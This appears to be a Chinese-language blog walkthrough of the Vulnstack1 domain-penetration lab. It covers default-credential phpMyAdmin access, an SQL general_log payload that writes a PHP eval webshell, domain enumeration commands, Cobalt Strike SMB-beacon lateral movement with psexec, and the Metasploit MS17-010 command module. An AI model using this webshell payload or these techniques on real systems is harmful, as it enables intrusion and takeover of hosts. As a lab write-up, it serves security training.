[域渗透]Vulnstack1_walkthrough

前言

最近想找找非IIS中间件的windows实战来搞搞,但是暂时没找到,不过无意中看到红日安全做的,练习域渗透的windows靶机:vulnstack,感觉不错。

环境搭建

按照红日安全公众号的文章,先在vmware的虚拟网络编辑器的添加两个仅主机的虚拟网络,网段分别为192.168.52.0192.168.72.0

Windows 7 x64再添加多一个网卡,分别连上VMnet1和VMnet2;Win2k3 Metasploiteable和Windows Server 2008 R2 x64连上VMnet1;最后攻击者主机最后连上VMnet2。

最后的最后还需要用密码[email protected]登录到Windows 7 x64,在C:\phpStudy目录里,手动启动phpStudy。

利用过程

信息收集

nmap扫了下发现开启了80和3306端口,phpStudy的mysql用户名和默认密码都为root,估计都没改,直接能在外网连上mysql。

http服务打开是一个phpStudy的探针,泄露了web目录的绝对路径。

扫目录就扫出来个phpmyAdmin和phpinfo。

打点

phpmyAdmin用众所周知的用户和密码root,就能登录进去。phpStudy的mysql也是高权限运行的,写文件getshell应该没什么问题。

into outfile在这里用不了,用下面的payload一次性写好shell。

1
2
3
4
set global general_log = 'ON';
set global general_log_file = 'C:/phpStudy/WWW/cmd.php ';
select '<?php @eval($_POST["cmd"]);?>';
set global general_log = 'OFF';

蚁剑连上去发现还有备份和一个cms,字典小没有扫到,cms这个方向应该也能getshell,但这里先按下不表。

横向移动

在蚁剑的模拟终端看了下,没有杀软,可以直接powershell无文件上线。

也因为是phpStudy,所以webshell也直接是高权限,提权都省了。看了下存在域,当前账号就是域管理员,域内主机有三台。

1
2
net group "domain admins" /domain
net group "domain computers" /domain

有了域管理员账号,讲道理直接横向移动就行,但这里内网主机不出网,还要做点前置操作。对比了几种方法,觉得smb管道正向连接比较简便。

  • 在监听列表添加一个SMB的Beacon。

  • 选择当前session,派生到SMB Beacon。

  • psexec横向移动监听选smb,session选派生出来的session。

接着等一小会就能上线了,命令能正常执行。

当然除了用域管理员横向移动,MS17-010也很可能能打得到。CS上的MS17-010说实话确实不好用,所以先派生个session到msf上,用autorouter做好路由后,用auxiliary/admin/smb/ms17_010_command模块,不出所料就打到了。其他模块打不动,有时候甚至回重启,也就算了。

#

评论

Your browser is out-of-date!

Update your browser to view this website correctly. Update my browser now

×